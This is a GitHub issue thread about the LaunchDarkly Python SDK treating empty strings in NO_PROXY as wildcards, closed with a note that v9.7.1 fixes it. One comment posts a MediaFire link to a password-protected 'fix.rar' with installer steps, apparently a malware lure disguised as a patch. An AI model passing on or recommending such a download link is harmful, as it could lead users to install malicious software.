### ISSUE TITLE
Empty strings in NO_PROXY sometimes treated as wildcard

### ISSUE THREAD

**Issue by hpelwintervold** [launchdarkly/python-server-sdk#308]
**Is this a support request?**
No

**Describe the bug**
`NO_PROXY` support added in https://github.com/launchdarkly/python-server-sdk/pull/301 will treat empty strings as wildcards in some cases. The logic should only treat `*` as a wildcard, never empty string.

**To reproduce**
Set `NO_PROXY` to one of the below strings:
`'secure.example.com:443,'` (matches all addresses due to trailing `,`)
`:8080` (matches all hosts due to leading `:`)

**Expected behavior**
`NO_PROXY` parsing should be more defensive against empty strings encountered.
`'secure.example.com:443,' should treat trailing `,` as never matching anything, or an error
`:8080` should never match anything, or be an error

**Logs**
N/A

**SDK version**
9.6.0

**Language version, developer tools**
Python 3.12.2

**OS/platform**
Ubuntu

**Additional context**
Comparison of `HTTP_PROXY`/`NO_PROXY` implementations: https://about.gitlab.com/blog/2021/01/27/we-need-to-talk-no-proxy/

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by keelerm84** [comment]
Fixed in v9.7.1
